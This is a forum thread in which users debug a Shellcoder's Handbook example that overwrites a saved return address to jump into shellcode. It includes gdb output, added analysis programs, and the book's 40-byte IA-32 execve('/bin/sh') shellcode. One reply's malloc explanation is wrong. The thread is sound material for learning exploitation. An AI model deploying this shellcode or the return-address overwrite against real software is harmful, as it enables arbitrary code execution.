Status: Solved

q about char code[] cast as (int)code conversion

Hi C area guys and gals,
The following is code from the Shellcoder's Handbook, page 23. It segfaults, and when debugging I run across an incomprehensible value for (int)shellcode.

char shellcode[] = "0001";   /* placeholder for the real payload; only its address matters here */
int main(void) {
  int *ret;
  /* Point two int-sized slots above the local. On the 32-bit frame the book
     assumes (ret at ebp-4) that is the saved return address at ebp+4. */
  ret = (int *)&ret + 2;
  /* Overwrite the saved return address with the address of shellcode, cast to
     an integer. This is the book's intentional return-address overwrite. */
  (*ret) = (int)shellcode;
  return 0;
}

As shown in the debugging cut/paste here:

(gdb) p shellcode
$1 = "0001"
(gdb) p &shellcode
$2 = (char (*)[5]) 0x8049534
(gdb) p (char *)shellcode
$3 = 0x8049534 "0001"
(gdb) p (int)shellcode
$4 = 134518068

$4 is different from the hex value 0x8049534, and sizeof char on RHFC2 is 4, so I thought it would print "1" because char shellcode[] = "0001". Why doesn't it?
Asked by joesp

1 Solution

tzxie2000 commented:
134518068 is exactly 0x8049534.
(int)shellcode will print the address of shellcode;
it does not mean parsing the string shellcode to an int value,
so it would not be 1.

If you tell us what this code is meant to tell you in the example, it may help us to explain it.
 
joesp (author) commented:
Uh, yes, I was wrong about the conversion -- I finally found a hextodec in converter.java and it is an int conversion of the address 0x8.....
What does it do?
They are adding 2 to the address of the first variable on the stack to overwrite its RET value (I think the stack is

RET
EBP
shellcode

so &shellcode+2 == &RET
(gdb) p &ret
$1 = (int **) 0xfeefdb64
(gdb) info registers
eax            0x0      0
ecx            0xfeefdbfc       -17835012
edx            0xfeefdbf4       -17835020
ebx            0x552ffc 5582844
esp            0xfeefdb60       0xfeefdb60
ebp            0xfeefdb68       0xfeefdb68
esi            0x1      1
edi            0x5550fc 5591292
eip            0x804834c        0x804834c

so &ret is between ebp and esp.

In gdb, &ret+1 == ebp.
If I use &ret+1 instead of &ret+2 it doesn't segfault. Does anybody know the purpose, though, of casting to "int"?
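The cast tzxie2000 explains above and the frame layout joesp worked out from gdb (&ret just below the saved ebp, RET two ints above it) can both be checked on the machine at hand instead of assumed. The following is an added example, not code from the thread or from the book. It relies on the GCC/Clang builtins __builtin_frame_address and __builtin_return_address, assumes an x86, x86-64 or AArch64 frame in which the return address sits one pointer above the saved frame pointer, and reports how many ints above &ret the return-address slot lies for the current build: 2 on the 32-bit frame in the thread, more on a 64-bit build where each pointer is 8 bytes and a stack canary may sit between the local and the saved frame pointer. The placeholder string shellcode is the thread's own; nothing on the stack is overwritten.

```c
/*
 * Added example (not from the book or the thread): probe where the saved
 * frame pointer and the return address really sit relative to a local
 * variable, so the "+2" in `ret = (int *)&ret + 2;` can be verified for
 * the machine the code is compiled on instead of assumed.
 *
 * Assumptions: GCC or Clang (__builtin_frame_address/__builtin_return_address)
 * on x86, x86-64 or AArch64, where the return address is stored one pointer
 * above the saved frame pointer.
 */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

char shellcode[] = "0001";   /* same placeholder string as in the thread */

struct frame_info {
    uintptr_t local;      /* address of the local `ret` */
    uintptr_t saved_fp;   /* address of the saved frame pointer slot */
    uintptr_t ret_slot;   /* address of the saved return address slot (assumed layout) */
    uintptr_t ret_value;  /* what that slot actually contains */
    uintptr_t expected;   /* what the compiler says the return address is */
};

/* Must not be inlined: we need a real frame with a saved FP and return address. */
static __attribute__((noinline)) struct frame_info probe_frame(void)
{
    int *volatile ret = NULL;   /* volatile: force a stack slot, like the book's `ret` */
    struct frame_info fi;

    fi.local    = (uintptr_t)&ret;
    fi.saved_fp = (uintptr_t)__builtin_frame_address(0);
    fi.ret_slot = fi.saved_fp + sizeof(void *);   /* assumption: ABI layout noted above */
    memcpy(&fi.ret_value, (const void *)fi.ret_slot, sizeof fi.ret_value);
    fi.expected = (uintptr_t)__builtin_return_address(0);
    return fi;
}

/* 1 if the computed slot really holds the function's return address. */
int ret_slot_is_correct(void)
{
    struct frame_info fi = probe_frame();
    return fi.ret_value == fi.expected;
}

/* How many `int`s above &ret the return-address slot lies, i.e. what the
 * book's "+ 2" would have to be on this machine. */
ptrdiff_t ints_from_local_to_ret_slot(void)
{
    struct frame_info fi = probe_frame();
    return ((ptrdiff_t)fi.ret_slot - (ptrdiff_t)fi.local) / (ptrdiff_t)sizeof(int);
}

/* The cast the asker wondered about: (int)shellcode, or portably
 * (uintptr_t)shellcode, is the array's address as an integer, not the
 * digits "0001" parsed. Returns 1 if that is what the cast yields. */
int cast_is_address_not_value(void)
{
    uintptr_t as_int = (uintptr_t)shellcode;
    return as_int == (uintptr_t)&shellcode[0] && as_int != 1;
}

int main(void)
{
    struct frame_info fi = probe_frame();
    printf("&ret         = %#lx\n", (unsigned long)fi.local);
    printf("saved FP at  = %#lx\n", (unsigned long)fi.saved_fp);
    printf("RET slot at  = %#lx (holds %#lx, compiler says %#lx)\n",
           (unsigned long)fi.ret_slot, (unsigned long)fi.ret_value,
           (unsigned long)fi.expected);
    printf("(int *)&ret + %td reaches the RET slot here; (uintptr_t)shellcode = %#lx\n",
           ints_from_local_to_ret_slot(), (unsigned long)(uintptr_t)shellcode);
    return 0;
}
```

Build with gcc or clang at -O0 or -O2 and run it. If ret_slot_is_correct() reports 1 the assumed layout holds for this build, and the printed count is the value the book's "+ 2" would need to be on this machine. On a 64-bit build (int)shellcode would also truncate the address, which is why uintptr_t is used here.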
 
smpoojary commented:
char shellcode[] = "0001";
int main() {
  int *ret;
// Here memory allocation statement for ret is missed.
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}

In the above code you didn't initialize memory for ret. To initialize memory, use malloc() or calloc(). That's why the segmentation fault is coming, meaning you can't use &ret + 2. First you have to initialize ret [ret = (int*)malloc(5*sizeof(int));], then you can write ret = ret + 2; (*ret)=(int)shellcode;

-Mahesh
 
tzxie2000 commented:
I think you should make clear the size in bytes of ebp .... on your computer and system.
 
PaulCaswell commented:
It's a stack hack!

>>ret = (int *)&ret + 2;

is taking the address of the only variable on the stack and adding 2 to it. It is therefore assuming that the return opcode is next on the stack, that it is 2 bytes in length and that there is an important address following it. It's then trying to hack that address to contain some stupid value: the address of a string in data space.

It WILL go bang on almost every system other than the one it was crafted for.

Paul
 
joesp (author) commented:
But my post at 8:43 shows
------------------
(gdb) p &ret
$1 = (int **) 0xfeefdb64
------------------
It has an address on the stack. Maybe what you mean is that it's not initialized, so the place it points to hasn't been initialized yet, or no space has been allocated on the heap .. but this is all just stack address manipulation.

ebp in x86 points to the beginning of the stack, like esp points to the current location of the stack pointer.
 
tzxie2000 commented:
ret really does not point to an allocated memory area.
The program surely wants to touch some part of the stack that normally cannot be accessed by the variables in the function.
I think it may be the return value of main,
but it is straightforward for
(*ret) = (int)shellcode;
So maybe you should read carefully what this example in the book wants to tell you.
If you still don't know the meaning, please post the book's reference part for the example and let's discuss it.
 
joesp (author) commented:
I may have to figure out on my own why it's not working. The book example he gives segfaults, unless I only add 1 to &ret ... which doesn't run the shellcode, so I will have to research this one. This problem runs deeper than I thought ... originally, I just wanted to know why it casts to an int. I'm still open for that answer, BTW.
 
joesp (author) commented:
Source:

http://www.sirfsup.com/languages/assembler/koziol/Chapter_02/Shellcoders02sampleprogram05.c

it should do this>:

$gcc shellcode.c -o shellcode
$./shellcode
#

As he explains, the shellcode is the objdump of executable code that creates a shell.
 
tzxie2000 commented:
Oh, I see.

I think it may want to assign the return position in the stack,

like in this slightly different code:

char shellcode[] = "0001";
int f(void);            /* prototype so f() is declared before main() uses it */
int main(void) {
  int i;
  f();
  i = 1;                /* the return address of f() normally points here */
  return i;
}
int f(void) {
  int *ret;
// Here memory allocation statement for ret is missed.
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
  return 0;
}

Normally the return address will be the code site at i=1, but after

  int *ret;
// Here memory allocation statement for ret is missed.
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;

the book wants to assign the return address to a data segment, and when the function f returns (and so main returns) it will access a data segment and lead to a seg fault.
 
joesp (author) commented:
Does this book example work for anybody else? You can download that source from that same page by clicking "any_browser_source.txt", or if you are using MSIE you need to click "msie.txt".
 
joesp (author) commented:
tzxie2000,

You are on the right track ... it is overwriting the return address, RET, by replacing that value (which points to an address) not with the address of wherever the hell "main" returns to after it exits, but with the address of shellcode, which (magically) (magic helped by the fact that it's an object dump?) executes (itself?) after main returns ... I am not convinced it is segfaulting because it is trying to access code from the data section .... once the program exits .... the code in the data section is returned to the system, and could just be any old addressable address, no?
 
tzxie2000 commented:
Yes, I tested the code.

I think maybe the shellcode assigned by the book
char shellcode[] =    
 "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
 "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
 "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

is more special and contains some code for the system.

I tested the code and my system crashed.
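The 40 bytes tzxie2000 quotes above can be examined without running them, which is safer than the crash described and shows what "contains some code for the system" means in practice. The following is an added example, not code from the thread or from the book: it takes the quoted bytes as a constant, checks the two properties a payload like this needs (it is exactly 40 bytes long and holds no 0x00 byte, so a strcpy carries all of it) and decodes the jmp/call/pop trick the code uses to obtain the address of "/bin/sh" without knowing where it was loaded. Only the two IA-32 opcodes involved are decoded (0xEB short jmp, 0xE8 call rel32); the offsets it reports (jmp at 0 to 28, call at 28 back to the pop at 2, "/bin/sh" at 33) are computed from the bytes, not taken from any outside source.

```c
/*
 * Added example (not from the book or the thread): inspect the book's
 * 40-byte IA-32 shellcode as data. Nothing here executes the payload.
 */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* The bytes quoted in the thread, stored as unsigned so opcode compares are clean. */
static const unsigned char shellcode[] =
    "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
    "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
    "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

#define SHELLCODE_LEN (sizeof(shellcode) - 1)   /* exclude the literal's own NUL */

size_t shellcode_len(void) { return SHELLCODE_LEN; }

/* 1 if no byte is 0x00; otherwise strlen/strcpy would cut the payload short. */
int shellcode_has_no_nul(void)
{
    return strlen((const char *)shellcode) == SHELLCODE_LEN;
}

/* Byte offset of "/bin/sh" inside the payload, or -1 if it is absent. */
int offset_of_bin_sh(void)
{
    static const char path[] = "/bin/sh";
    size_t n = sizeof(path) - 1;
    for (size_t i = 0; i + n <= SHELLCODE_LEN; i++)
        if (memcmp(shellcode + i, path, n) == 0)
            return (int)i;
    return -1;
}

/* Target of an EB xx short jump located at `at`, or -1 if that byte is not EB.
 * The 8-bit displacement is relative to the end of the 2-byte instruction. */
int short_jmp_target(size_t at)
{
    if (at + 2 > SHELLCODE_LEN || shellcode[at] != 0xeb) return -1;
    int8_t rel = (int8_t)shellcode[at + 1];
    return (int)(at + 2) + rel;
}

/* Target of an E8 rel32 call located at `at`, or -1 if that byte is not E8.
 * The 32-bit little-endian displacement is relative to the end of the 5-byte call. */
int call_target(size_t at)
{
    if (at + 5 > SHELLCODE_LEN || shellcode[at] != 0xe8) return -1;
    uint32_t u = (uint32_t)shellcode[at + 1]
               | ((uint32_t)shellcode[at + 2] << 8)
               | ((uint32_t)shellcode[at + 3] << 16)
               | ((uint32_t)shellcode[at + 4] << 24);
    return (int)(at + 5) + (int32_t)u;
}

/* A call pushes the offset of the byte after it as its return address.
 * For the call at `at` that is the value the following `pop` picks up. */
int call_pushed_offset(size_t at)
{
    return call_target(at) < 0 ? -1 : (int)(at + 5);
}

int main(void)
{
    int jmp_to  = short_jmp_target(0);        /* first instruction: jmp forward */
    int call_to = call_target((size_t)jmp_to); /* the jump lands on a call going back */
    int pushed  = call_pushed_offset((size_t)jmp_to);

    printf("length %zu, NUL-free: %s\n", shellcode_len(), shellcode_has_no_nul() ? "yes" : "no");
    printf("jmp @0 -> %d, call @%d -> %d (byte there is %#x, pop %%esi)\n",
           jmp_to, jmp_to, call_to, shellcode[call_to]);
    printf("call pushes offset %d, \"/bin/sh\" found at offset %d\n",
           pushed, offset_of_bin_sh());
    return 0;
}
```

The address the call pushes is exactly where "/bin/sh" starts, so after the pop %esi the code holds a pointer to the string no matter where in memory the payload was placed; that is the position-independence tzxie2000's comment hints at, and it is also why the bytes must not contain 0x00.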
 
joesp (author) commented:
tzxie2000, thank you for your time. I am sorry we couldn't resolve this. It is only the second chapter; I will post here when I find the answer later in the book .... I don't have the time at the moment.
 
tzxie2000 commented:
You're welcome.
